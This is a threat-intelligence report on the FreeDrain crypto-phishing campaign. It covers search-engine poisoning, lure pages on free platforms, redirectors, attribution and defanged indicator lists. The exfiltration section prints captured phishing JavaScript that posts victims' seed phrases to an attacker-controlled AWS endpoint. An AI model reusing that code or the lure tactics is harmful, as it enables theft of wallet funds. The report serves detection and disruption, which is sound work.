While we weren’t able to assist in recovering the lost assets, this outreach marked a turning point. It became clear that the incident was not isolated. We set out to uncover the infrastructure behind the scam and understand the broader operation enabling these thefts to occur at scale.

Cracking the Surface – Our First Look at FreeDrain

When Validin published the initial findings in April 2024, one key piece of the puzzle remained unclear: how were these phishing pages reaching victims at scale? While common delivery methods like phishing emails, SMS (smishing), social media posts, and blog comment spam are frequently used in cryptocurrency scams, none appeared to be the source in this case.

That changed with the report from the victim in May. They had encountered the phishing site via a top-ranked search engine result, not a suspicious message or unsolicited link.

Curious whether we could reproduce the victim’s experience, we conducted a series of keyword searches ourselves. The results were startling.

Search terms like “Trezor wallet balance” returned multiple malicious results across Google, Bing, and DuckDuckGo, often within the first few result pages.

Trezor Wallet Balance malicious result in DuckDuckGo

Trezor Wallet Balance malicious result in top Bing Search

Trezor Wallet Balance malicious result in Top Google Search result

These were not obscure or poorly maintained phishing sites; they were professionally crafted lure pages freely hosted on subdomains of trusted platforms like gitbook.io, webflow.io, and github.io.

This discovery marked our first real glimpse into the scale and sophistication of the FreeDrain campaign—and raised a host of new questions. Specifically, what is the overall workflow once a victim visits the site, how are these pages becoming so highly ranked, and what can we discover about the attackers themselves?

Workflow – A Victim’s Path to Compromise

To understand how victims were being funneled into this operation and the post-visit workflow, we checked out the top-ranked search results that we knew weren’t connected to authoritative, legitimate websites, looking for malicious behavior. Within minutes, we encountered related live phishing pages, and quickly began piecing together the end-to-end workflow that a typical victim might experience.

The attack chain was deceptively simple:

  1. Search for wallet-related queries (e.g., “Trezor wallet balance”) on a major search engine.
  2. Click a high-ranking result, often hosted on a seemingly trustworthy platform like gitbook.io or webflow.io.
  3. Land on a page displaying a large, clickable image, a static screenshot of the legitimate wallet interface.
  4. Click the image, which does one of the following:
    • Redirects the user to a legitimate website.
    • Redirects the user through one or more intermediary sites.
    • Leads directly to a phishing page.
  5. Arrive at the final phishing site, a near-perfect clone of the real wallet service, prompting the user to input their seed phrase.

Attack chain summary

The entire flow is frictionless by design, blending SEO manipulation, familiar visual elements, and platform trust to lull victims into a false sense of legitimacy. And once a seed phrase is submitted, the attacker’s automated infrastructure will drain funds within minutes.

Lure page linking to phishing page

Redirect to legitimate site

Lure Page Ranking – Weaponizing SEO

We were stunned by the sheer volume of lure pages appearing among top-ranked search results across all major search engines. These weren’t complex, multi-layered scams. In most cases, the pages consisted of just a single large image (again, usually a screenshot of a legitimate crypto wallet interface) followed by a few lines of text that offered seemingly helpful instructions; ironically, some even claimed to educate users on how to avoid phishing.

This type of simplistic, Q&A-style content is well-known in SEO circles for being rewarded by search engine algorithms. Because users often turn to search engines for direct answers, pages that appear to offer guidance, even when malicious, can be algorithmically elevated in rankings, especially when hosted on high-reputation platforms.

In our early investigation (May–June 2024), we found that many of these lure pages were hosted on services like webflow.io and gitbook.io. Both platforms provide low-friction publishing, enabling anyone to spin up a custom subdomain and publish arbitrary content for free. The subdomains used followed familiar spammer patterns, frequent use of hyphens, deliberate misspellings, and keyword stuffing to manufacture variation and dodge blacklisting.

Subdomain naming scheme similarities

Generative AI as a Tool for Scale

The text on many lure pages bore clear signs of having been generated by large language models. We found copy-paste artifacts that revealed the specific tools used, most notably strings like “4o mini”, a likely reference to OpenAI’s GPT-4o mini model. These telltale traces suggest that FreeDrain operators are leveraging generative AI to create content at scale, and at times doing so carelessly.

Fake content mistakenly including OpenAI GPT-4o mini reference

FreeDrain’s Secret Weapon – Spamdexing

But content alone doesn’t explain how these pages were getting indexed and ranked above legitimate sources. How were search engines even discovering them?

The answer came when we identified several indexed URLs pointing back to high-ranking lure pages, and traced them to massive comment spam campaigns. FreeDrain operators appear to be heavily abusing neglected web properties that allow open or weakly-moderated comments, flooding them with links pointing to their lure pages. This old tactic, known as spamdexing, is a well-documented SEO abuse technique, and FreeDrain relies on it heavily to game search rankings.

In one striking example, we found a Korean university photo album page with a single image uploaded over a decade ago, buried under 26,000 comments, nearly all of them containing spam links.

FreeDrain uses large-scale comment spam on poorly-maintained websites to boost the visibility of their lure pages via search engine indexing

This technique allows FreeDrain to sidestep traditional delivery vectors like phishing emails or malicious ads, instead meeting victims exactly where they’re looking, at the top of trusted search engines.

Tracking Search Results

Understanding how FreeDrain’s lure pages consistently climbed to the top of search results became a key investigative goal, and it demanded custom tooling.

We built a purpose-specific crawler designed solely to emulate search engine queries, navigate through pages of search results, and extract structured data from each result: URLs, page titles, and text content summaries. The goal was to systematically monitor how malicious pages were ranking, shifting, and proliferating over time.

We ran this system daily across 700 unique keyword permutations, capturing up to 40 pages deep per search query, per search engine. This daily monitoring provided a dynamic, longitudinal view into the visibility of FreeDrain’s infrastructure.

The Scale of Abuse

After four months of collection, we amassed a dataset of more than 200,000 unique URLs, drawn from topical search results across at least a dozen different publishing platforms that allow users to create custom subdomains. Aggressively filtering, we identified over 38,000 distinct FreeDrain subdomains hosting the lure pages.

These subdomains appeared on well-known free hosting and publishing platforms, including:

  • Gitbook (gitbook.io)
  • Webflow (webflow.io)
  • Teachable (teachable.com)
  • Github.io
  • Strikingly (mystrikingly.com)
  • WordPress.com
  • Weebly.com
  • GoDaddySites (godaddysites.com)
  • Educator Pages (educatorpages.com)
  • Webador (webador.com)

Breakdown of total domains to suspected URLs, to Confirmed URLs by quantity

The volume and spread across legitimate platforms further highlights how FreeDrain relies on the low-friction, high-trust nature of these services to evade detection and amplify reach.

To go beyond static discovery, we implemented scheduled re-crawls of every suspected lure page. This allowed us to track:

  • Content updates over time
  • Changes in redirect behavior
  • New final-stage phishing URLs being introduced
  • Takedowns and domain churn

This gave us a clearer picture of FreeDrain’s infrastructure lifecycle, from initial lure page creation to eventual takedown or abandonment, which helped us understand the rotation strategies used to keep malicious links live and searchable.

Lure Page Breakdown

Despite being spread across a wide array of publishing platforms, FreeDrain lure pages followed a remarkably consistent structure, carefully optimized to appear helpful and legitimate, while subtly guiding victims toward compromise.

Common Elements Observed Across Lure Pages

Across gitbook.io, webflow.io, github.io, and others, the pages typically included:

  • A single, large, clickable image occupying most of the viewport
    • This image was a screenshot of a legitimate cryptocurrency site (e.g., Trezor, Metamask, or Ledger)
    • The image linked externally, usually to a malicious redirection chain
  • AI-generated help content positioned below the image
    • The text answered common user queries like “How do I check my wallet balance on Trezor?”
  • 1–2 additional embedded links, which pointed to the same external destination as the image or were placeholders like "#"

Link Behavior: Redirection Variability

Clicking the image or associated links triggered unpredictable outcomes, depending on the time, user agent, or page freshness:

  • Redirection through one or more intermediary domains (typically 1–5 hops)
  • Final destinations varied widely:
    • A phishing page built to capture wallet seed phrases (hosted on Azure or AWS S3)
    • A legitimate site like trezor.io or metamask.io, creating false reassurance
    • A non-functional domain (404 or NXDOMAIN)
    • The current page itself ("#") acting as a placeholder when infrastructure wasn’t active

This redirection behavior made classification challenging, especially since not every page led directly to a phishing endpoint in every instance. We observed that lure pages initially hosted benign content before being modified to include malicious redirects, usually weeks or months later. This aging tactic likely helped the sites build trust and survive longer before being flagged or removed.

A Github lure page that has just been changed from benign to malicious

Obfuscation Through Variation

Identifying FreeDrain lure pages at scale proved difficult due to extreme variation in phrasing, metadata, and platform-specific formatting. For example, we identified 46 unique renderings of the word “Trezor”, all visually similar, using tricks like added Unicode characters, zero-width spaces, and mixed script alphabets.
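
To illustrate how such look-alikes can be collapsed for clustering, here is a minimal normalization sketch (assuming the unicode-normalization crate; the zero-width character list is illustrative, not exhaustive):

use unicode_normalization::UnicodeNormalization;

// Collapse common homoglyph tricks: NFKC-normalize, drop zero-width characters,
// and lowercase, so "Trezor" variants cluster under one key.
fn normalize_brand(raw: &str) -> String {
    raw.nfkc()
        .filter(|c| !matches!(c, '\u{200B}' | '\u{200C}' | '\u{200D}' | '\u{FEFF}'))
        .collect::<String>()
        .to_lowercase()
}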

Trezor variation heatmap by quantity

Demonstrating the variations in tooling use, we found that FreeDrain pages on github\.io were usually copies of the generated content from services like Mobrise Website Builder and Webflow.


Snippets of pages hosted on github\.io with content clearly generated using other tools, for example, “Mobrise Website Builder”

A turning point in connecting these fragmented domains came from pivoting off the redirection infrastructure. While the lure content varied, the redirectors often remained consistent across pages and platforms.

Validin result showing redirector abusing free services

By tracing traffic from anchor links to known FreeDrain redirectors, we were able to map common ownership and activity across otherwise-unrelated services. This infrastructure-based pivot became essential for clustering and attribution, bridging gaps that the lure content itself couldn’t.

Redirectors

Pivoting on URLs from known and suspected FreeDrain lure pages that we were monitoring, we quickly noticed some noteworthy patterns in the FreeDrain redirection domains.

Domain Characteristics

Nearly all redirector domains shared several features:

  • .com TLDs exclusively
  • Names that appeared algorithmically generated, likely via a Domain Generation Algorithm (DGA) or Markov chain model
  • English-adjacent structure, visually familiar but never forming real English words

Examples include:

  • antressmirestos[.]com
  • shotheatsgnovel[.]com
  • bildherrywation[.]com

Each URL also included a GUID-like string in the path, which may have served as a session ID, traffic source identifier, or logic gate for redirection behavior. Examples:

  • https://causesconighty[.]com/ce405b14-337a-43a5-9007-ed1aaf807998
  • https://causesconighty[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://disantumcomptions[.]com/61e7fc9c-baef-43f0-82bf-a7f12a025586
  • https://disantumcomptions[.]com/6c31ec3b-0d4b-4bf4-a9f4-91453c4ef99e
  • https://distrypromited[.]com/d7c95729-6eed-452a-b246-865e0d97fc23
  • https://distrypromited[.]com/ff933705-9619-4292-9e22-02269acc197b
  • https://posectsinsive[.]com/9431711a-cf35-4ebd-b5db-eacba9ef7ee3
  • https://posectsinsive[.]com/994ffe2a-21fb-448a-b4e3-01b9483c5460

(A complete list of FreeDrain-associated redirector domains is provided in the appendix.)

Domain Registration and Infrastructure Clues

All domains we identified were registered via Key-Systems GmbH, a registrar often used for bulk domain purchases and programmatic registration.

Initially, we suspected that these domains were all managed by the FreeDrain operators as well, but have since connected these domains to a much larger network of thousands of domain names that are used to route traffic for many different purposes.

Looking at DNS history for some of the older redirectors on our list, we saw that they rotated IP addresses relatively infrequently, resolving to just a small number of IPs within a time window of weeks to months.

DNS history for scientcontopped[.]com prior to expiration (2024)

The domain resolved to only a handful of IPs over its active life, suggesting stable, centralized hosting infrastructure.

Pivoting on IP addresses shared by these older FreeDrain domains revealed that there are hundreds of other domain names that share nearly identical characteristics in terms of naming conventions, registration patterns, and hosting patterns. Yet, these other domains didn’t exhibit direct ties to FreeDrain behavior.

Pivot from confirmed FreeDrain redirector (yellow asterisk) reveals broader domain ecosystem with matching infrastructure traits

This led us to two possibilities:

  1. The redirectors are part of a leased infrastructure-as-a-service model, used by FreeDrain and potentially many other threat actors
  2. FreeDrain is a subdivision of a broader operation, with shared tooling and infrastructure but distinct campaigns

At this stage, the full extent of this infrastructure and the relationships between campaigns remain an open research question. What is clear, however, is that FreeDrain does not operate in isolation, and the redirection layer may be a service used by multiple actors.

Phishing Pages

Across our monitoring, we observed dozens of variations in FreeDrain phishing pages, but technically they were all fairly simple and consistent in architecture.

These phishing pages were most often:

  • Hosted on cloud infrastructure, primarily Amazon S3 and Azure Web Apps
  • Designed to mimic legitimate cryptocurrency wallet interfaces (Trezor, MetaMask, Ledger, etc.)
  • Implemented using HTML forms or AJAX POST requests to transmit stolen credentials to attacker-controlled endpoints

A typical FreeDrain phishing page served from an S3 bucket, delivering only static content

Some S3-hosted phishing sites sent harvested data to live backend services on Azure, as seen in multiple instances where form actions pointed to azurewebsites.net applications.

The form for an S3-hosted FreeDrain phishing page posts to “/send.php” running in Azure

Human Operators Behind the Scenes

While most pages used standard static phishing techniques, we occasionally encountered live chat widgets embedded in Azure-hosted phishing pages.

This chat feature had previously been documented in a 2022 report by Netskope (one of the few references we ever found to FreeDrain and the earliest reported). Our own interactions confirmed that humans, not bots, were responding to victim inquiries in real time, often providing reassurance or technical “help” to keep targets engaged.

Live chat interaction on a phishing page hosted in Azure

Clean, Unobfuscated Exfiltration Code

In the malicious JavaScript we observed handling POST requests with stolen seed phrases, the code is well-formatted, commented, and does not appear to be obfuscated in any way. Full examples are provided in the appendix, but a snippet of the POST request is below (domain bolded and defanged):

const data = {};
inputs.forEach((input, index) => {
    data[`phrase${index}`] = input.value.trim();
});
data.subject = "Trezor connect2";
data.message = "Successfull fetch data";
$.ajax({
    type: "POST",
    url: "https://rfhwuwixxi.execute-api.us-east-1.amazonaws[.]com/prod/eappmail",
    dataType: "json",
    crossDomain: true,
    contentType: "application/json; charset=utf-8",
    data: JSON.stringify(data),
    success: function (result) {
        alert('Data submitted successfully1!');
        window.location.href = 'https://suite.trezor.io/web/';
        location.reload();
    },
    error: function (xhr, status, error) {
        window.location.href = 'https://suite.trezor.io/web/';
    }
});

Despite its simplicity, the phishing backend was effective, disposable, and often difficult to trace—highlighting just how low the bar is for technical sophistication when paired with wide-scale reach and persistent lure infrastructure.

Actor Analysis

Attribution is inherently difficult when infrastructure is ephemeral and built on shared, free-tier services. Yet through a combination of repository metadata, behavioral signals, and timing artifacts, we were able to extract meaningful insights about FreeDrain’s operators, including likely location, working patterns, and their degree of operational coordination.

Our first major breakthrough came from GitHub Pages (github.io), which only allows hosting via a public repository that matches the account’s GitHub username (e.g., username.github.io). This constraint meant every active FreeDrain lure page hosted on GitHub had a publicly accessible repository behind it.

We cloned hundreds of these repositories and analyzed the commit metadata, including timestamps, usernames, email addresses, and whether commits were made via the CLI or web interface. Several clear patterns emerged:

  • Email addresses were always unique, tied 1:1 with the GitHub account, and never reused.
  • All emails came from free providers like Gmail, Hotmail, Outlook, and ProtonMail.
  • While naming styles varied widely (capitalization, numbers, patterns), we found clusters of similarly structured addresses, suggesting manual creation by multiple individuals, possibly using shared templates or a common naming approach.

Sample of email addresses found in FreeDrain-associated Github commit

Importantly, GitHub commits preserve the local timezone of the user unless manually configured otherwise. In our dataset, over 99% of commits were timestamped in UTC+05:30 (Indian Standard Time), our first strong geographic indicator.

Over 99% of the commits analyzed were localized to UTC+05:30

We corroborated this signal using metadata from other free-tier infrastructure and services used by FreeDrain. Webflow, for instance, embeds a “last published” timestamp in the HTML source of hosted sites. When we aggregated timestamps across the many FreeDrain Webflow pages, a clear 9-to-5 weekday work pattern emerged, complete with a consistent midday break. This pattern aligns closely with a standard business schedule in the IST timezone.
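
A simplified sketch of that aggregation (assuming RFC 3339 timestamps and the chrono crate; the scraping of the "last published" field is omitted):

use chrono::{DateTime, FixedOffset, Timelike};

// Bucket publish times by local hour in UTC+05:30; a 9-to-5 weekday pattern
// shows up as a clear peak across working hours.
fn publish_hour_histogram(timestamps: &[&str]) -> [u32; 24] {
    let ist = FixedOffset::east_opt(5 * 3600 + 30 * 60).expect("valid offset");
    let mut buckets = [0u32; 24];

    for &ts in timestamps {
        if let Ok(parsed) = DateTime::parse_from_rfc3339(ts) {
            buckets[parsed.with_timezone(&ist).hour() as usize] += 1;
        }
    }
    buckets
}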

Aggregated Webflow publish times show an exceptionally clear weekday work pattern in UTC+05:30
Webflow embeds publish timestamps into the HTML source code of published websites

Combining these and other signals across platforms, we assess with high confidence that FreeDrain is operated by individuals based in the IST timezone, likely in India, working standard weekday hours.

Additionally, timeline analysis shows that FreeDrain has been active since at least 2022, with a notable acceleration in mid-2024. As of this writing, the campaign remains active across several free hosting and publishing platforms.

Confirmed “last published” times, by date

Disruption Efforts and Opportunities

The scale and diversity of services abused by FreeDrain made disruption an ongoing challenge. While the campaign leaned heavily on free-tier platforms, many of which allowed users to publish images, text, external links, and even custom JavaScript to subdomains under well-known parent domains, very few of these platforms offered streamlined abuse reporting workflows.

In most cases, there was no direct method to report malicious content from the content page itself, forcing us to manually investigate each platform’s policies, support forms, or contact channels. This adds unnecessary friction to the response process, especially when scaled across hundreds of active malicious pages.

Even more concerning, most of the publishing platforms lacked the detection capabilities to identify this type of coordinated abuse on their own. The indicators were there: repetitive naming patterns, clustered behavior, identical templates reused across subdomains, but limited proactive action was being taken.

This highlights a broader industry need:

  • Free-tier content platforms should invest in basic abuse prevention tooling and more accessible reporting mechanisms.

At minimum, this includes:

  • Allowing abuse to be reported directly from published content pages
  • Monitoring for patterns of misuse (e.g., bulk account creation, similar domain structures, repeated hosting of external phishing kits)
  • Establishing direct communication lines with trusted threat intel analysts and threat researchers

FreeDrain’s reliance on free-tier platforms is not unique, and without better safeguards, these services will continue to be weaponized at scale.

This isn’t just a security issue, it’s a business one. When threat actors abuse these platforms to host phishing pages, fake login portals, or crypto scams, they erode user trust in the entire platform domain. Over time, this leads to real financial consequences:

  • Reputation damage: Reputable domain names like webflow.io and teachable.com can quickly become flagged by corporate security tools, browser warning systems, and threat intelligence feeds. This reduces their utility for legitimate users and undermines the brand’s credibility.
  • Deliverability and discoverability: Once a platform’s domain is associated with widespread abuse, search engines, email providers, and social networks may down-rank or block links from that domain, hurting all users, including paying customers.
  • Customer churn and support burden: Abuse-driven issues often result in a higher volume of customer support tickets, complaints, and refunds, particularly when paying users find their content mistakenly flagged or blocked due to a shared domain reputation.
  • Increased infrastructure and fraud costs: Hosting abusive content, even at scale on free tiers, still consumes compute, storage, and bandwidth. Worse, it may attract waves of automated account signups and resource abuse that raise operational costs.

Failing to detect and mitigate this kind of abuse isn’t just a user risk; it’s an unpaid tax on the business, dragging down growth and trust at every layer. Proactive abuse prevention and streamlined reporting are not just table stakes for security; they’re critical to long-term sustainability.

References and Similarities to Other Campaigns

Elements of the FreeDrain campaign were first publicly documented in August 2022 by Netskope, with a follow-up report in September 2022. Netskope’s early findings captured the core tactics that continue today: leveraging SEO manipulation to drive traffic to lure pages, which then redirect to credential-harvesting phishing sites. Netskope also published another update in October 2024, focusing on FreeDrain’s use of Webflow-hosted infrastructure, confirming the campaign’s continued evolution while retaining the same fundamental workflow.

FreeDrain’s abuse of legitimate free-tier platforms is part of a broader trend in phishing infrastructure, but it remains distinct from other well-known crypto phishing efforts. For example, the CryptoCore campaign, reported by Avast in August 2024, similarly targets cryptocurrency users but relies heavily on YouTube content and impersonation videos to draw in victims, rather than search engine poisoning and static phishing sites.

In 2023, Trustwave reported on the use of Cloudflare’s pages.dev and workers.dev services in phishing, showing how modern hosting platforms that offer free, customizable subdomains with minimal friction are being systematically exploited, mirroring FreeDrain’s approach.

Recent reporting has also shed light on the kinds of threat actors that may be behind campaigns like FreeDrain. Just this week, the U.S. Treasury sanctioned individuals linked to cyber scam operations in Southeast Asia, specifically a militia group in Burma involved in online fraud networks. While distinct from FreeDrain, these operations share similar hallmarks: large-scale abuse of online infrastructure, technical capability, and a focus on financial theft, demonstrating the scale and organization such campaigns can operate under.

FreeDrain’s techniques have also been informally documented by affected users. In particular, Trezor hardware wallet customers have reported fraudulent websites mimicking the Trezor ecosystem, some of which were part of FreeDrain’s infrastructure.

Conclusion

The FreeDrain network represents a modern blueprint for scalable phishing operations, one that thrives on free-tier platforms, evades traditional abuse detection methods, and adapts rapidly to infrastructure takedowns. By abusing dozens of legitimate services to host content, distribute lure pages, and route victims, FreeDrain has built a resilient ecosystem that’s difficult to disrupt and easy to rebuild.

Through detailed infrastructure analysis, repository metadata mining, and cross-platform behavioral correlations, we uncovered rare insights into the actors behind the campaign, including strong indicators that the operation is manually run by a group based in the UTC+05:30 timezone, working standard business hours. Despite this visibility, systemic weaknesses in reporting mechanisms and abuse detection have allowed FreeDrain to persist and even accelerate in 2024.

This is not just a FreeDrain problem. The broader ecosystem of free publishing platforms is being exploited in ways that disproportionately benefit financially motivated threat actors. Without stronger default safeguards, identity verification, or abuse response infrastructure, these services will continue to be abused, undermining user trust and inflicting real-world financial harm.

By exposing the scale and structure of the FreeDrain network, we hope this research will enable better platform-level defenses, more informed user education, and collaboration across the security community to limit the reach and longevity of operations like this.

Indicators of Compromise and Relations

Full List of IOCs can be downloaded here.
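
The indicators below are defanged in two styles: the lure URLs escape the dot before the hosting platform’s domain (for example, gitbook\.io), while the redirector domains and phishing URLs use bracketed dots ([.]). If you want to load them into a blocklist or threat-intel platform, a minimal refanging sketch along the following lines may help; it is an illustrative helper written for this post, not part of the published IOC package.

# Hypothetical helper to refang the defanged indicators listed below.
# Illustrative only; adapt to your own ingestion pipeline.
def refang(indicator: str) -> str:
    """Undo the two defanging styles used in this appendix."""
    s = indicator.strip()
    s = s.replace("[.]", ".")    # bracketed dots in domains and phishing URLs
    s = s.replace("\\.", ".")    # backslash-escaped dots in lure URLs
    return s

if __name__ == "__main__":
    samples = [
        "https://metamaskchromextan.gitbook\\.io/us",
        "swissborglogi[.]xyz",
        "https://atomicwallet.azurewebsites[.]net/",
    ]
    for s in samples:
        print(refang(s))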

FreeDrain Lure Pages

Download Full List for over 40,000 URLs
Sample:

https://metamaskchromextan.gitbook\.io/us
https://suprt-ios-trzorhard.gitbook\.io/en-us
https://bridge-tziuur.gitbook\.io/en-us
https://auth-ledger-com-cdn.webflow\.io/
https://start—leddger-cdn-auth.webflow\.io/
https://help–ledgre-auth-us.webflow\.io/
https://home-trezsor-start.gitbook\.io/en-us
https://wlt-phantom-wlt.webflow\.io/
https://bridge-cen-trezseer.gitbook\.io/en-us
https://ledgerauth-wellat.webflow\.io/
https://ledgerivwaselet-us.webflow\.io/
https://extentrust.gitbook\.io/en-us
https://truststextion.gitbook\.io/us
https://apps-support—mettmask.gitbook\.io/us
https://cobo-wallet-digital-cdm.webflow\.io/
https://extension–metaamsk-info.gitbook\.io/us
https://bridge-docs–trzc.gitbook\.io/en-us
https://suite-trezoreio.gitbook\.io/us
https://auth–io-coinbausehelp.gitbook\.io/us
https://help-blockf-cdnn.teachable\.com/p/home

FreeDrain Redirect Domains

These are the redirector domains we directly observed being leveraged by FreeDrain over the past 3+ years.

affanytougees[.]com
ameddingpersusan[.]com
anicnicpriesert[.]com
antressmirestos[.]com
aparingupgger[.]com
bildherrywation[.]com
boutiondistan[.]com
brasencewompture[.]com
carefersoldidense[.]com
causesconighty[.]com
charweredrepicks[.]com
chazineconally[.]com
chierstimines[.]com
chopedansive[.]com
claredcarcing[.]com
coadormertranegal[.]com
coateethappallel[.]com
comaincology[.]com
coneryconstiny[.]com
conkeyprowse[.]com
coutioncargin[.]com
coveryinting[.]com
crefoxappecture[.]com
curphytompared[.]com
darylapsebaryanmar[.]com
deconsorconsuperb[.]com
disantumcomptions[.]com
distrypromited[.]com
escentdeveriber[.]com
fladestateins[.]com
flesterwisors[.]com
forrofilecabelle[.]com
gaiterimturches[.]com
goestodos[.]com
grawableaugespare[.]com
gresesticparray[.]com
guardawalle[.]com
hunnerdimental[.]com
issetheserepson[.]com
lamothyadjuncan[.]com
leatlyinsioning[.]com
leavesnottered[.]com
listationsomminder[.]com
litnentschelds[.]com
minarymacrefeat[.]com
mingaryshestence[.]com
nashiclehunded[.]com
obiansvieller[.]com
paticableharent[.]com
penlabuseoribute[.]com
peridneyperadebut[.]com
pladamousaribached[.]com
posectsinsive[.]com
pringingsernel[.]com
saverateaubtle[.]com
scientcontopped[.]com
screnceagrity[.]com
searranksdeveal[.]com
shotheatsgnovel[.]com
sonyonsa[.]com
stalitynotinium[.]com
storsianpreemed[.]com
swissborglogi[.]xyz
teleedlescestable[.]com
tirzrstartio[.]com
topsorthynaveneur[.]com
tralizetrulines[.]com
trighlandcomping[.]com
versaryconnedges[.]com
walitykildsence[.]com
wintrolancing[.]com

Phishing URLs

https://atomicwallet.azurewebsites[.]net/
https://bietbutylogn.azurewebsites[.]net/
https://biokefeiwltliv29gleed.azurewebsites[.]net/
https://bitgetwalt.azurewebsites[.]net/
https://bleuckfie-coins.azurewebsites[.]net/
https://bleuckkfiecoins.azurewebsites[.]net/
https://bleuickkfiescoins.azurewebsites[.]net/
https://blocckfi-api.azurewebsites[.]net/
https://blocikifi.azurewebsites[.]net/
https://blockffiecoinas.azurewebsites[.]net/
https://blockfi-api.azurewebsites[.]net/
https://blockfiapp-apk.azurewebsites[.]net/
https://blockfiicoins.azurewebsites[.]net/
https://blockificoinz.azurewebsites[.]net/
https://blockifiicoins.azurewebsites[.]net/
https://blockkfi-api.azurewebsites[.]net/
https://blockkfiapi-apk.azurewebsites[.]net/
https://blockkkfifies.azurewebsites[.]net/
https://bloickfie-app.azurewebsites[.]net/
https://bloickfiicoins.azurewebsites[.]net/
https://bloickkfieecoinss.azurewebsites[.]net/
https://bloickkfieescoins876.azurewebsites[.]net/
https://bloiickkfieecoinase.azurewebsites[.]net/
https://blokfi-error.azurewebsites[.]net/
https://blokkfiapp-api.azurewebsites[.]net/
https://blokkifi.azurewebsites[.]net/
https://bloockkfi-api.azurewebsites[.]net/
https://blouckfi-api.azurewebsites[.]net/
https://bluckfi-error.azurewebsites[.]net/
https://bluckfilogn.azurewebsites[.]net/
https://blueckficoinis.azurewebsites[.]net/
https://bluickkfiecoins.azurewebsites[.]net/
https://boloickfieecoins.azurewebsites[.]net/
https://buloickkfieecoins876.azurewebsites[.]net/
https://cbswlterliv487wlt.azurewebsites[.]net/
https://cionbise-error.azurewebsites[.]net/
https://cnbse13liv.s3.eu-north-1.amazonaws[.]com/index.html
https://cobo-wallet.azurewebsites[.]net/
https://cobowalletoffc.azurewebsites[.]net/
https://cobowalletz.azurewebsites[.]net/
https://coienebaiseerlivwlt02elisa.azurewebsites[.]net/
https://coinibisasesn567.azurewebsites[.]net/
https://dft0-hjgkd26-fkj.s3.us-east-1.amazonaws[.]com/index.html
https://edgeronwlet.azurewebsites[.]net/
https://edgersuwlet.azurewebsites[.]net/
https://eedu0s-jhdc-osxza.s3.us-east-1.amazonaws[.]com/index.html
https://en-ledger-cdn.azurewebsites[.]net/
https://en-trezor-cdn-auth.azurewebsites[.]net/
https://en-trezor-cdn.azurewebsites[.]net/
https://errorciiobiosewds876.azurewebsites[.]net/
https://errorcoibisaeseaenbaeb876.azurewebsites[.]net/
https://errorlovblockfi876.azurewebsites[.]net/
https://errorlovbloikcffie876.azurewebsites[.]net/
https://errorlovbolockfiee987.azurewebsites[.]net/
https://errorlovcobisaed786.azurewebsites[.]net/
https://errorlovcoibioise876.azurewebsites[.]net/
https://errorlovexdkekam879.azurewebsites[.]net/
https://errorlovexds987.azurewebsites[.]net/
https://errorlovtenizr987.azurewebsites[.]net/
https://errorlovtrasenzjedsuties.azurewebsites[.]net/
https://errorlovtreazezz876.azurewebsites[.]net/
https://errorlovtrikmanen987.azurewebsites[.]net/
https://errormetiamiasks876.azurewebsites[.]net/
https://errormetismesk987.azurewebsites[.]net/
https://errortreazeeasd-suties.azurewebsites[.]net/
https://ertzirdnwwltliv.azurewebsites[.]net/
https://exd98uswlterliv.azurewebsites[.]net/
https://exdiusiwalet.azurewebsites[.]net/
https://ezioron1wlet.azurewebsites[.]net/
https://iotruzorsuite.azurewebsites[.]net/
https://itrusttcepitalcoins.azurewebsites[.]net/
https://kaikzx-slsld39-lkjf.s3.us-east-1.amazonaws[.]com/index.html
https://krakenzcoins.azurewebsites[.]net/
https://ladzearwlt03jokesmko.azurewebsites[.]net/
https://ldr-0gr-dsxz.s3.us-east-1.amazonaws[.]com/index.html
https://leddgeircoins.azurewebsites[.]net/
https://leddgersacoins.azurewebsites[.]net/
https://ledeagderwallet.azurewebsites[.]net/
https://ledg-01jghe0fhdk.s3.eu-north-1.amazonaws[.]com/index.html
https://ledgar-live-walliet.s3.us-east-2.amazonaws[.]com/index.html
https://ledger-start-403.azurewebsites[.]net/
https://ledger-start-api.azurewebsites[.]net/
https://ledgercoinserror3.azurewebsites[.]net/
https://ledgercoinsweb3.azurewebsites[.]net/
https://ledgersapi-apk.azurewebsites[.]net/
https://ledgersapp.azurewebsites[.]net/
https://ledgirlvestart.azurewebsites[.]net/
https://ledigerwaliteasee.azurewebsites[.]net/
https://ledzaererwltliv30mariamon.azurewebsites[.]net/
https://ledzor365livwlter.azurewebsites[.]net/
https://legdrlievlgin.azurewebsites[.]net/
https://leidgeierwalitese.azurewebsites[.]net/
https://leidgirscoinsweb.azurewebsites[.]net/
https://leldger-live.azurewebsites[.]net/
https://lezor3021sxes.azurewebsites[.]net/
https://lfg0-oiosh-hdh.s3.us-east-1.amazonaws[.]com/index.html
https://lgnwltcnbsliv.azurewebsites[.]net/
https://lledgerwallest.azurewebsites[.]net/
https://lzr13wlt.s3.eu-north-1.amazonaws[.]com/index.html
https://metamaskdn.azurewebsites[.]net/
https://metamasksrs.azurewebsites[.]net/
https://metamassk.azurewebsites[.]net/
https://mmetamassk.azurewebsites[.]net/
https://mtmsklivwlter57wlt.azurewebsites[.]net/
https://ndaaxscoins.azurewebsites[.]net/
https://ndaxcoins.azurewebsites[.]net/
https://ndeauxcoinsweb.azurewebsites[.]net/
https://neaiaxcoins.azurewebsites[.]net/
https://oduisshweb3.azurewebsites[.]net/
https://portal-treaeameaene876.azurewebsites[.]net/
https://ra0-lkjd01-gfhjd.s3.eu-north-1.amazonaws[.]com/index.html
https://relkd28-lokdyuj.s3.us-east-1.amazonaws[.]com/index.html
https://sdfg0d28-djkfk.s3.us-east-1.amazonaws[.]com/index.html
https://secuxwallet-api.azurewebsites[.]net/
https://sjdhd29-oiuw0.s3.us-east-1.amazonaws[.]com/index.html
https://sledegerwallet.azurewebsites[.]net/
https://solflareewerror.azurewebsites[.]net/
https://suiitewalettrzior.azurewebsites[.]net/
https://teirzoriiostart.azurewebsites[.]net/
https://tereamanezheoakeeoake.azurewebsites[.]net/
https://tereazeriwaleits.azurewebsites[.]net/
https://tereizercoinswalts.azurewebsites[.]net/
https://tereizercoinsweb.azurewebsites[.]net/
https://tereziiorcoinsweb3.azurewebsites[.]net/
https://tereziioreeae-walieats.azurewebsites[.]net/
https://terezorcoinscweb3.azurewebsites[.]net/
https://terezuiear-api.azurewebsites[.]net/
https://terozeiorwltliv31wikub.azurewebsites[.]net/
https://terozriosiuet.azurewebsites[.]net/
https://terzoerirwlt476liv.azurewebsites[.]net/
https://tirizeriostrt.azurewebsites[.]net/
https://tirizurstrtio.azurewebsites[.]net/
https://tirzwltliv09erds.azurewebsites[.]net/
